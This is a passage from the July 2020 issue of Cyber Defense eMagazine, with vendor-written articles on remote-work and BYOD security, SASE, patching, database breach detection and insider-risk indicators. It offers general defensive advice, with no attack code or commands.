are particularly vulnerable to a cyberattack. How could they not be when they are operating on thinner<br />
margins, with limited IT staff and less financial reserves than enterprises? To minimize security risk,<br />
SMBs need to put these practices in place when personal devices are being used to access business<br />
data:<br />
Embrace a Cultural Security Mindset. One of the obstacles to getting personal device security<br />
under control is the mindset that someone else, usually IT, ‘owns’ the cybersecurity and data<br />
protection problem. Even though 70 percent of data breaches are known to start at the endpoint,<br />
this data point isn’t translating into the average employee or contractor’s consciousness.<br />
No matter how strong defenses are, users can introduce threats to a company’s networks by:<br />
• Falling for phishing scams<br />
• Posting secure information on social media<br />
• Inadvertently giving away credentials<br />
Employees will more enthusiastically embrace BYOD/UYOD security protocols if management<br />
has effectively communicated not only the how behind day-to-day practices to prevent malware<br />
or other attacks, but also why mitigating risks is so critical. Acceptable use guidelines might<br />
include:<br />
• How to detect social engineering tactics and other scams<br />
• What constitutes acceptable Internet usage<br />
• How remote workers should securely access the office network<br />
• How to properly use password management systems<br />
• How to report security incidents according to their urgency<br />
To encourage employees to adopt ownership of their own device security, it’s important to note<br />
smaller enterprises thrive on being more nimble. This ‘get it done now’ mentality can lead to<br />
applications being put into play before being thoroughly vetted for access controls and may cause<br />
a rise in “shadow IT” which may not meet organizational security standards. It can also lead to<br />
‘rogue’ assets, or personal devices being deployed without full vetting for risks.<br />
The recent wholesale shift to remote working has highlighted this risk more than ever as personal<br />
device use explodes. When communicating with employees, there needs to be a careful balance<br />
between asking them to be more mindful of security and realizing their first goal is always to get<br />
their work done. Communication and education here are essential to individual participation in<br />
helping mitigate risk at the endpoint.<br />
Optimize Limited Resources. With limited IT staff, and often no dedicated security staff, SMBs will<br />
be looking to guard against the increased security risks from COVID-19 by executing strategic<br />
security initiatives for newly remote workers and supporting long-term viability. One critical need<br />
in threat defense is endpoint detection and response (EDR) software. EDR is vital to containing<br />
a costly breach that could financially devastate an SMB or enterprise. EDR can help software<br />
security teams contain, investigate and respond to threats that may have bypassed other<br />
defenses like antivirus tools. An effective EDR solution can provide automated analysis of data to<br />
identify suspicious activity, enabling IT to make a timely decision on the threat level and take quick<br />
action accordingly.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 30<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Simplifying personal endpoint device protection is also imperative. Managing protection for many<br />
devices, given scarce resources, demands centralized management from a single pane of glass<br />
to provide real time protection and on-demand remediation. Many SMBs may also consider<br />
outsourcing their security needs to a managed service provider (MSP) in order to free up<br />
resources, but this should not take the place of employee security training.<br />
Apply Privacy Protection. As users work from home, they need an extra layer of protection to stop<br />
cyberattack risk – as they are no longer behind the security of your corporate network. This is<br />
where the value of a virtual private network (VPN) comes into play. This important, and often<br />
overlooked, layer of defense ensures that a users’ IP address is private, secure, and encrypted,<br />
helping to protect your business data.<br />
Serving as a digital middleman between the user and the Internet, a VPN can deter hacking and<br />
unauthorized tracking which will help prevent employees from being cyberthreat targets. It works<br />
like an encrypted tunnel between the user and your data, keeping away the prying eyes of threat<br />
actors looking to access your business data – including passwords, personally identifiable<br />
information (PII), customer information, credit card numbers and more. By employing a VPN, you<br />
can limit the risk of employees working from their personal networks while protecting critical<br />
business and customer information.<br />
Post-COVID Environment<br />
Eventually employees will begin returning to work onsite, but this crisis has demonstrated the benefits of<br />
working at home. This means that the heightened use of personal devices for business is here to stay.<br />
SMBs can manage this new working reality by improving employee communication on threat prevention,<br />
creating a strategy to more thoroughly record and protect assets, and implementing the protection of a<br />
VPN to keep important business data away from prying eyes.<br />
In the longer term, all these security measures are going to be critical to economic viability.<br />
<strong>Cyber</strong>criminals have been exploiting COVID-19, but they will revert back to other forms of cybercrime soon<br />
enough and ransomware attacks, costly data breaches and business disruption will be back in the news.<br />
SMBs can avoid tragedy by implementing strong preventative anti-attack measures now.<br />
About the Author<br />
Akshay Bhargava is the Chief Product Officer at Malwarebytes, a leading<br />
provider of advanced endpoint protection and remediation solutions.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 31<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
7 Security Precautions to Protect Remote Workers<br />
By Marty Puranik, President & CEO, Atlantic.Net<br />
The COVID-19 pandemic has engulfed the world's population, crippled global economies, and changed<br />
the way of life for almost every single person in every single country around the world. Nearly six million<br />
infection cases have been confirmed. Over two million people have recovered, but over 350,000 deaths<br />
have been registered so far, and sadly this figure is expected to grow substantially in the coming days<br />
and weeks.<br />
Governments around the world have encouraged employees to work from home wherever possible.<br />
Frontline key workers are still required to continue their occupations but unfortunately, many millions<br />
have lost their jobs, and tens of millions have been furloughed on government financial aid.<br />
Currently, there is an enormous workforce engaged and actively working from home, keeping businesses<br />
alive in one of the biggest challenges to face a generation. Some reporters are referring to this shift in<br />
working behavior as the greatest work-from-home experiment.<br />
With this paradigm shift of working behavior, additional risks and security concerns must be considered<br />
to protect organizations from things like wire transfer fraud, ransomware, and exploitation. There is a vast<br />
amount of evidence to suggest that cybercriminals are out in force to take advantage of the COVID-19<br />
pandemic.<br />
The most common attack vectors seen in recent weeks are targeted and extensive phishing email<br />
campaigns and spoofing using SMS and mobile communications platforms such as WhatsApp.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 32<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
What can you do to protect your workforce and business from being compromised? We have compiled<br />
a list of some of the most effective measures to be undertaken to protect your organization.<br />
Make Sure Your Security Policy Is Valid<br />
The COVID-19 outbreak has highlighted that most organizations’ cybersecurity policies, especially<br />
policies regarding mobile computing and teleworking, may be inadequate. Businesses have been<br />
scrambling to change the guidelines to adapt to the pandemic. Very few organizations would have had a<br />
business continuity strategy that solved all the issues brought about by the seismic shift to home working.<br />
Specific policies to update may revolve around the physical protection of company IT equipment, making<br />
sure children or relatives do not use company assets, which can help to keep assets in good working<br />
condition. If additional technology is needed by the employee, such as extra monitors, keyboards, or<br />
printers, a formal process should exist to track where company assets are located. Perhaps logging a<br />
service desk ticket for management teams to approve the removal of company technology. This process<br />
greatly improves how assets can be tracked.<br />
Other control measures can be introduced or updated to define the organization's rules and regulations<br />
on the usage of laptops, computers, handheld tablets, mobile phones, and digital media, including disks<br />
and memory sticks.<br />
Keep Data Protection Relevant<br />
Maintaining data protection is critically important for organizations, even more so when employees are<br />
working from home. Organizations are duty-bound by government regulations to uphold data protection.<br />
The regulations still apply no matter where the employees are working, be that an office-based role, or<br />
when working from home.<br />
All laptops should have some form of data encryption software installed, such as Microsoft BitLocker.<br />
This software protects the data stored on the employee’s physical device. In the event a company device<br />
is lost or stolen, the data is secured and encrypted. Domain policies can force remote terminals to lock<br />
the screen after a few minutes of inactivity during the lockdown period.<br />
All portable equipment should have a machine or boot-up password, and a domain user account that<br />
should be required when powered up. This may be a BIOS protected screen lock, or it might just be the<br />
Windows Logon utility. Either way, the device must not boot straight into the operating system without<br />
prompting for credentials. This will stop unauthorized access to the data stored on the equipment.<br />
Secure Physical Assets<br />
High valued assets must already have the standard security features such as usernames, passwords,<br />
and PINs. Extreme care should be taken with mobile computing being used outside of the organization’s<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 33<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
premises. In the home environment, extra care should be taken to secure customer and organizational<br />
data.<br />
Protection should be in place to avoid unauthorized access or disclosure of the information stored and<br />
processed by the equipment. No other person should be able to access the equipment or view information<br />
on the screen, and you should guard against eavesdropping. Do not openly discuss confidential or<br />
Payment Card Information where you may be overheard.<br />
Create Strong Passwords<br />
Ensuring a strong and robust password protection policy might sound like common sense, however, the<br />
weakest point of security on a corporate network is the end-user. Enforcing system-wide, managed<br />
password policies can help to create a hardened perimeter on the network.<br />
Support teams may have to do a little extra work to unlock and reset user accounts if the password is<br />
forgotten, but instilling a complex password policy, and a regular, enforced password expiration date will<br />
help to give the best protection to the remote workforce.<br />
Introducing multi-factor authentication (MFA) for home workers can add extra security for business<br />
assets. Using MFA to access cloud storage such as Onedrive, or when accessing Exchange email<br />
systems and collaboration tools such as Slack, Teams, or Skype for Business, will add an extra layer of<br />
security when out of the office.<br />
Communication and the Training of Homeworkers<br />
Lots of people have worked from home in the past, but for many, COVID-19 has forced employees to<br />
use technology and work from home for the first time. For many, this change is extremely difficult to adapt<br />
to. Not only at a technical level, but adapting to online meetings and working on your own.<br />
This introduces many security risks. Employees may not remember all the rules of home working. They<br />
may bring their device or they may unintentionally share confidential information on social media.<br />
Clear and concise communication channels from senior management or HR should communicate a<br />
consistent message defining what the expectations of the employee are. The messaging should describe<br />
how the business intends to function during a lockdown and what the company priorities are.<br />
Combine that with training sessions, online classes, or one-on-one training about how to use<br />
collaboration tools, cloud productivity tools, and how working from home affects access to everyday user<br />
applications.<br />
Engaging with employees regularly is a great way to promote wellbeing at work, and keep productivity<br />
and engagement throughout the business. This benefits morale, and importantly creates a greater<br />
understanding of how to use computer systems securely.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 34<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
System Updates / Antivirus<br />
Security updates to operating systems and applications have never been more important than during the<br />
COVID-19 crisis. System administrators have the responsibility of ensuring that the mobile workforce<br />
information technology is up to date and has the latest security updates.<br />
When an employee's laptop connects to a corporate network, it will typically check in with a centralized<br />
administration portal, such as Microsoft System Center (SCCM). Toolsets like this manage the update<br />
schedule of thousands of laptops, computers, and mobile devices over a VPN or standard Internet<br />
connection.<br />
Administrators can force updates out on demand to keep antivirus, antimalware, and system updates at<br />
the latest level. This creates the best line of defense against malware and ransomware attacks.<br />
Software Protections<br />
The software on the portable equipment must comply with the organizational standards to ensure it is<br />
supportable. As mentioned earlier, up-to-date antivirus detection software is installed to protect local<br />
systems. No unauthorized software should be loaded on to company assets, no matter how trivial.<br />
Software should not be tampered with to circumvent security measures put in place, such as disabling<br />
antivirus system scans.<br />
Any tampering of the software should be considered a disciplinary offense, and the antivirus suite should<br />
be configured to audit user behavior. When used to access the Internet, the user’s device should utilize<br />
a proxy server where the activity is logged and monitored.<br />
About the Author<br />
Marty Puranik co-founded Atlantic.Net from his dorm room at the<br />
University of Florida in 1994. As CEO and President of Atlantic.Net,<br />
one of the first Internet Service Providers in America, Marty grew the<br />
company from a small ISP to a large regional player in the region, while<br />
observing America's regulatory environment limit competition and<br />
increase prices on consumers. To keep pace with a changing industry, over the years he has led<br />
Atlantic.Net through the acquisition of 16 Internet companies, tripling the company's revenues and<br />
establishing customer relationships in more than 100 countries. Providing cutting-edge cloud hosting<br />
before the mainstream did, Atlantic.Net has expanded to seven data centers in three countries.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 35<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
The Race to Pivot Around Remote Work and The<br />
Emergence Of SASE<br />
By Amit Bareket, CEO and Co-Founder of Perimeter 81<br />
When Kodak completely neglected the rise of digital photography (an idea that Kodak itself invented) and<br />
then continued to willfully drive for a revival of technology destined for the dustbin, it became the<br />
boilerplate example of what can happen when an organization fails to embrace change, and chooses to<br />
fight against the current rather than go with the flow.<br />
Trends and new sources for demand force companies to refresh their business models and pivot around<br />
new concepts, or slowly perish. This is happening now in security, where providers still get away with<br />
offering singular and traditional solutions like firewalls, antivirus software, and VPNs - but not for long.<br />
These products do help to ward off a number of the most common attacks, but converging trends have<br />
whipped up industry waves almost reminiscent of those that once toppled the giant of film.<br />
Crowding the Cloud<br />
The adoption of cloud technology among companies has been full steam ahead for the last decade or<br />
more, and as it becomes our new normal, the security industry must react with new ways to protect data<br />
that’s anywhere and everywhere. For a business, ascension to the cloud has been deliberately slow, a<br />
department here, a business flow there, so the tide of this sea change has been gradual.<br />
At least, it was until recently. No one wants to harp on the lessons taught by COVID-19, but here we are.<br />
Suddenly, organizations with a desire to exist into the next fiscal year find themselves scrambling to grant<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 36<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
access to remote employees, and this has meant the rapid adoption of cloud technologies and<br />
subsequent creation of a host of new issues that security providers must now respond to.<br />
Overloaded networks on traditional architecture experience high latency, and each new employee<br />
connecting to the resources they need to work slows down the connection speed of his or her peers.<br />
Performance is small potatoes, though. IT teams are more overwhelmed with the number and variety of<br />
different devices and unfamiliar sources of traffic, and security leaders are racing to provide a better<br />
solution than what was available just last year.<br />
IT Still Catching Up Cloud-Wise<br />
Many cloud services tied into local environments and available to many remote workers (often from<br />
personal Wi-Fi connections with dubious security) create gaps where exposure occurs, even due to small<br />
issues such as how they’re configured. A business’s resources may be secure but the wrong box ticked<br />
in the admin panel of a cloud-based service is enough to open cracks that need just a bit of pressure to<br />
widen into a breach.<br />
Sensitive data is also exchanging more hands faster than ever, during a time when hackers are ramping<br />
up their activities to take advantage of the pandemic panic. Under these conditions, orchestrating a stack<br />
of traditional security products isn’t enough, even if they can be deployed in a way that secures the<br />
network on paper. We don’t live on paper. In reality, the tool sprawl approach creates maintenance issues<br />
that the security industry must address alongside classic ideas like threat detection and visibility.<br />
For IT, planning security for in-office infrastructure is simpler, because all employees are always<br />
connecting from the same devices, locations, and IP addresses. Very few security “profiles” need to be<br />
built, so even with an unwieldy and piecemeal stack of different security tools, smart network access<br />
doesn’t need to be scalable. Once network traffic moves from inside the office to outside, however, each<br />
remote worker represents a unique threat.<br />
Remote Work Accelerates the Materialization of SASE<br />
Which providers will be the ones to respond best to the future of remote work - the one where the idea of<br />
remote network access is fast, secure, and scalable? Surely not those who still offer singular firewall<br />
services, or those with a basic VPN solution. None of these solutions alone is enough to defend the<br />
network. Funnily enough, the blueprint for a single security product that might do so was created only<br />
months before the conditions that would necessitate it.<br />
This security ‘blueprint’ is at the heart of a new industry space race. In fact, the idea is so young that it is<br />
prevalent largely among providers rather than the consumers of security, such as in-house IT<br />
professionals. Called SASE, or Secure Access Service Edge, Gartner coined this term to describe a<br />
unified network security product deployed over the cloud (SaaS), which would change how organizations<br />
consume security and refocus it around users.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 37<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Imagined as able to integrate directly with all the resources used by any organization, sans hardware, a<br />
SASE product will make it stunningly simple for the average IT employee to segment the network and<br />
create custom access profiles based on user roles, devices, or locations. At the same time he or she can<br />
enforce the use of advanced security features still sold separately, like IPSec tunneling, 2FA, DNS<br />
filtering, FWaaS, and CASB, and route employee traffic through secured gateways closest to wherever<br />
they choose to work.<br />
The Beacon is Lit<br />
It wasn’t the idea of SASE that signaled the starting gun for the security sector’s space race, it was the<br />
rush to support remote workers and the off-hand realization that SASE was a prebuilt solution. The rising<br />
trend of remote work has then also paralleled the prevalence of SASE in the market, and significant<br />
progress has occurred in the space to bring the horizon closer. In the near future, any enterprise-level<br />
company will only need to deploy a single product to secure its local and cloud networks, and the<br />
employees connecting to them from couches and cafes around the world.<br />
Mergers and acquisitions are happening at breakneck speed in the security industry right now, and the<br />
landscape a year from now will be nearly unrecognizable. Reminiscent of how other industries have seen<br />
their products and services consolidated (the evolution of Microsoft’s product suite into Office 365 is a<br />
clear example), security is soon to become a matter of simply point, and click.<br />
About the Author<br />
Amit Bareket is the Co-Founder and CEO of Perimeter 81. Amit is<br />
a cybersecurity expert with extensive experience in system<br />
architecture and software development. He is the author of 8<br />
patents issued by the USPTO for storage, mobile applications and<br />
user interface. Prior to Perimeter 81, Amit worked as a Software<br />
Engineer for major enterprises including IBM XIV Storage and<br />
BigBand Networks. He served in the Israel <strong>Defense</strong> Force’s elite<br />
cyber intelligence unit and graduated Cum Laude with a B.Sc. in<br />
Computer Science and Economics from Tel Aviv University.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 38<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Organizations: It’s Time to Rethink How You Protect<br />
Environments from Within<br />
By Richard Melick, senior technical product manager, Automox<br />
Many of us have made the shift to virtual with our work, school and social lives, as we all aim to protect<br />
ourselves and the community during this uncertain time. As such, it’s important to understand that with<br />
new virtual workflows comes an expanded attack surface for hackers to potentially exploit.<br />
In particular, many organizations are struggling with securing and hardening new and existing endpoints<br />
against critical vulnerabilities, an issue that has been exacerbated as remote work policies are enacted.<br />
Automox’s recent <strong>Cyber</strong> Hygiene Index surveyed 560 IT and security professionals and uncovered that<br />
less than 50 percent of organizations can patch vulnerable systems swiftly enough to protect against<br />
critical threats and zero-day attacks.<br />
Endpoint hardening is a critical component of any security strategy, and if not properly managed, can<br />
pose a major threat to an organization's infrastructure. Attackers only need to find one way in to victimize<br />
a system or device – and an endpoint that isn't equipped with the latest patches and security<br />
configurations is likely to be ripe with exploitable vulnerabilities. It is essentially leaving a door unlocked<br />
with a welcome sign out front for attackers.<br />
Is it possible to lessen devastating data breaches within enterprises? Yes, but effective cyber hygiene<br />
measures must be put into place, especially during transitional and uncertain times like today.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 39<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
The Ongoing Patching and Configuration Crisis<br />
When you couple new potential entry points for hackers to exploit along with the fact that organizations<br />
report taking up to 102 days for patches to be applied and tested, it is apparent that the enterprise attack<br />
surface is growing at an unprecedented rate.<br />
To fully understand the scope of the issue, look no further than three years ago with the WannaCry<br />
ransomware attack. The ransomware was able to spread rapidly by exploiting a known vulnerability that<br />
was left unpatched in a large majority of organizations for months – leading to one of the most notorious<br />
hacking events of our lifetime.<br />
Research for the Automox <strong>Cyber</strong> Hygiene Index also confirmed that four out of five organizations have<br />
suffered at least one data breach in the last two years. When asked about the root causes, respondents<br />
placed phishing attacks (36%) at the top of the list, which is to be expected. Social engineering attacks<br />
continue to be a favorite initial vector that attackers use.<br />
The surprising part of the results is that the majority of breaches could have been prevented with basic<br />
cyber hygiene practices in place. The other top causes were missing operating systems patches (30%),<br />
missing application patches (28%), and operating system misconfigurations (27%) – all of which are<br />
fundamentals of proper endpoint hardening.<br />
The Industry is Failing to Keep Up<br />
Adversaries are weaponizing new critical vulnerabilities within 7 days on average. And zero-day<br />
vulnerabilities are already weaponized at the moment of disclosure, yet companies are known to take<br />
weeks and in some cases months to deploy patches.<br />
For this reason, a 24 / 72 threshold for endpoint hardening is imperative. If organizations can commit to<br />
eliminating zero-day exploits within 24 hours and other critical vulnerabilities within 72 hours, they’ll<br />
prevent weaponization and ultimately better protect their critical assets.<br />
According to the recent survey, the industry is still catching up to meet this ambitious patching standard.<br />
Only 42 percent of companies can patch remote endpoints within three days and 15 percent within one,<br />
highlighting the struggles companies face with patching and hardening endpoints in remote<br />
environments.<br />
Embracing Newer Technologies to Help<br />
One of the more positive outcomes from the research is that companies are increasingly embracing<br />
automation as a potential antidote for the security challenges that they are currently facing.<br />
The findings showed that 96 percent of organizations have deployed some automation for endpoint<br />
patching and hardening, yet only 23 percent are fully automated.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 40<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
While newer technologies, such as automation, are not a silver bullet, they sure can help ease the efforts<br />
in protecting infrastructure – and executing complex tasks in a timely manner. This effectively eases the<br />
burden on IT and SecOps teams, all while maintaining better security for the organization as a whole, a<br />
true win-win scenario.<br />
The Answer to Better <strong>Cyber</strong> Hygiene?<br />
Good cyber hygiene doesn't have to be complicated. A great place to start to make the transition to a<br />
more modern approach is to audit your organization and take a look at how it leverages its people,<br />
processes and technologies to better secure its endpoints and other assets.<br />
Are our people being put in a position to succeed? What processes could be eliminated or improved?<br />
Are we getting enough out of our technologies to make our security team’s workflow easier?<br />
By answering these important questions and acting on that information, organizations will have a better<br />
understanding of how they can adapt their strategies to address today’s and tomorrow’s challenges.<br />
In times of uncertainty, it’s important that businesses look for long-term fixes, as opposed to putting a<br />
band-aid on issues that are likely to pop up again. The future of work is remote, and it’s critically important<br />
that decision-makers across every industry set their IT and security teams up for future success while<br />
meeting the standards they need to meet today.<br />
About the Author<br />
Richard Melick, senior technical product<br />
manager, Automox. Richard has spent over a<br />
decade advancing through the security industry<br />
with his considerable experience and<br />
considerable focus on the stories surrounding<br />
ransomware, hacking, and cyber attacks. He has<br />
been a security speaker on five continents and<br />
has even advised royalty on how to make and<br />
distribute ransomware.<br />
Richard can be reached online at<br />
(Automox@famapr.com, @AutomoxApp, etc..)<br />
and at our company website<br />
https://www.automox.com/<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 41<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Don’t Be Breached When Using Commercial Software<br />
Products<br />
By Randy Reiter CEO of Don’t Be Breached<br />
In May, <strong>2020</strong> the software giant SAP made available eighteen security fixes for its Adaptive Server<br />
Enterprise (ASE) database system (formerly Sybase ASE). ASE is used by SAP products and 30,000<br />
organizations worldwide. 90% of the top 50 banks and security firms use ASE.<br />
Four of the eighteen security fixes had a CVSS score of 8 or higher. Common Vulnerability Scoring<br />
System (CVSS ) is a free and open industry standard for assessing the severity of computer system<br />
security vulnerabilities. Vulnerabilities are scored from 0 to 10 with 10 being the most severe.<br />
One of the security fixes was for SQL Injection Attacks. This vulnerability allowed any user of a database<br />
regardless of their permission level to gain Administrator access to the entire database. Wow.<br />
SAP software products are comprehensive and complex. SAP customers have added on average up to<br />
2 million lines of custom code to their deployment. This makes applying security patches a lengthy<br />
process due to comprehensive application testing requirements prior to deployment of the security fixes.<br />
Other <strong>2020</strong> Database Security Vulnerabilities:<br />
• June, <strong>2020</strong>. KingMiner botnet operation targets SQL Server databases with brute force attacks.<br />
The KingMiner botnet has been active since 2018. Once KingMiner gains access to SQL Server<br />
it is capable of gaining root access to the Windows server.<br />
• May, <strong>2020</strong>. Hacker leaked online the database for 7,600 websites serviced by Daniel’s Hosting.<br />
Daniel’s Hosting is the largest free web hosting provider for Dark Web services. The leaked<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 42<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
database included 3,000+ email addresses, 7,000+ account passwords and 8,000+ private keys<br />
for .onion (dark web) domains.<br />
How to Protect Confidential Database Data from Insider Threats and Hackers?<br />
Confidential database data includes: credit card, tax ID, medical, social media, corporate, manufacturing,<br />
law enforcement, defense, homeland security and public utility data. This data is almost always stored in<br />
Cassandra, DB2, Informix, MongoDB, MariaDB, MySQL, Oracle, PostgreSQL, SAP Hana, SQL Server<br />
and Sybase databases. Once inside the security perimeter a Hacker or Rogue Insider can use commonly<br />
installed database utilities to steal confidential database data.<br />
Non-intrusive network sniffing can capture and analyze the normal database query and SQL activity from<br />
a network tap or proxy server with no impact on the database server. This SQL activity is very predictable.<br />
Database servers servicing 10,000 end-users typically process daily 2,000 to 10,000 unique query or<br />
SQL commands that run millions of times a day.<br />
Advanced SQL Behavorial Analysis of Database Query and SQL Activity<br />
Advanced SQL Behavioral Analysis of the database SQL activity can learn what the normal database<br />
activity is. Then from a network tap or proxy server the database query and SQL activity can be nonintrusively<br />
monitored in real-time and non-normal SQL activity immediately identified. Non-normal SQL<br />
activity from Hackers or Rogue Insiders can be detected in a few milli seconds. The Hacker or Rogue<br />
Insider database session can be immediately terminated and the Security Team notified so that<br />
confidential database data is not stolen.<br />
Advanced SQL Behavioral Analysis of the query activity can go even further and learn the maximum<br />
amount of data queried plus the IP addresses all queries were submitted from for each of the 2,000 to<br />
10,000 unique SQL queries sent to a database. This type of data protection can detect never before<br />
observed query activity, queries sent from a never observed IP address and queries sending more data<br />
to an IP address than the query has ever sent before. This allows real-time detection of Hackers and<br />
Rogue Insiders attempting to steal confidential web site database data. Once detected the security team<br />
can be notified within a few milli-seconds so that a data breach is prevented.<br />
About the Author<br />
Randy Reiter is the CEO of Don’t Be Breached a Sql Power Tools company. He<br />
is the architect of the Database <strong>Cyber</strong> Security Guard product, a database data<br />
breach prevention product for Informix, MariaDB, Microsoft SQL Server, MySQL,<br />
Oracle and Sybase databases. He has a Master’s Degree in Computer Science<br />
and has worked extensively over the past 25 years with real-time network sniffing<br />
and database security. Randy can be reached online at<br />
rreiter@DontBeBreached.com, www.DontBeBreached.com and<br />
www.SqlPower.com/<strong>Cyber</strong>-Attacks.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 43<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Is Proactive Insider Risk Mitigation Possible?<br />
Why Companies Need More Than Technical Indicators to Identify Their Biggest Threats Before They<br />
Do Harm<br />
By David A. Sanders, Director of Insider Threat Operations, Haystax<br />
Most corporate insider threat programs are structured and equipped to mitigate adverse events<br />
perpetrated by trusted insiders only after they have occurred. But proactive insider risk management is<br />
possible – and it starts with a robust approach to detection.<br />
Consider this scenario, based on a real-life case, in which a concerning insider threat event turns out to<br />
be more complicated than expected:<br />
John commented to other employees that it would be easy to take down the new cloud services<br />
his company recently migrated to from their on-premises systems. The employees reported the<br />
comment to their manager, who reported it to human resources and ultimately the company’s<br />
insider threat program. An investigation revealed that John was angry because his role had<br />
changed with the new architecture. In addition, he was clinically depressed, off medication and<br />
had suicidal thoughts. The investigative results prompted a coordinated response among the<br />
insider threat program, security, legal and human resources. The threat was mitigated, with the<br />
final step of referring John to the employee assistance program.<br />
Because the insider threat team was notified about one behavioral indicator of a high-impact event,<br />
additional indicators were gathered and assessed to determine that John was a potential threat to the<br />
company and to himself. In doing so, the company was able to intervene and proactively mitigate an<br />
insider threat event before it occurred. The resulting cost and impact were minimal. By contrast, the<br />
projected cost and impact of the cloud services being taken off-line for one day were very high.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 44<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
It is impossible to know whether John would have committed an act of sabotage or self-harm, but the<br />
mitigation efforts nevertheless reduced the chances and allowed John to remain employed and<br />
productive.<br />
Without a proactive response, the alternative is to detect and respond to an event after it occurs, incurring<br />
the cost of the impact then attempting to minimize the effect.<br />
The Path to Proactive Risk Mitigation<br />
Eric Shaw and Laura Sellers created the ‘Critical Path to Insider Risk’ in 2015, after studying insider threat<br />
cases in the U.S. intelligence community and at the Department of <strong>Defense</strong>. They concluded that<br />
perpetrators exhibit observable indicators prior their acts. This concept is represented in the graphic<br />
below.<br />
Source: Eric Shaw and Laura Sellers (2015) "Application of the Critical-Path Method to Evaluate Insider<br />
Risks," Studies in Intelligence, Volume 59, Number 2, June, pages 41-48. The Central Intelligence<br />
Agency, Washington, DC.<br />
The practical application of these findings is that knowledge of ‘personal predispositions’ and behavioral<br />
indicators can inform the judgment of experts to determine whether an insider is on the path to becoming<br />
a risk.<br />
Based on that judgment, a measured and effective response can be planned to assess the risk through<br />
preliminary assessments – and perhaps a complete investigation, if warranted. The goal is to mitigate or<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 45<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
prevent the insider risk event by engaging with the potential threat early. This is precisely what occurred<br />
in John’s case. The company responded effectively to ‘turn John around’ and prevent potentially hostile<br />
and harmful acts from occurring.<br />
Technical and Non-Technical Risk Indicators<br />
The <strong>Defense</strong> Counterintelligence and Security Agency (DCSA) Center for Development of Security<br />
Excellence published a list of potential risk indicators, which are categorized below into ‘Technical<br />
Indicators’ and ‘Non-Technical Indicators.’ Technical indicators can be detected by monitoring and<br />
analyzing computer and network activities. Non-technical indicators typically occur off the computer and<br />
network and therefore cannot be detected on those systems.<br />
Insider threat potential risk indicators categorized by whether or not they can be commonly detected by<br />
monitoring computer and network activity.<br />
While the average enterprise insider threat program might not share the same objectives as DCSA, the<br />
agency’s human-centric view of the challenge is instructive to companies because the cause of insider<br />
threat problems is, by definition, known individuals associated with and managed by the organization.<br />
Effort and resources allocated to gathering, integrating and analyzing non-technical indicators to better<br />
know those individuals can improve the effectiveness of programs that mostly rely on technical indicators<br />
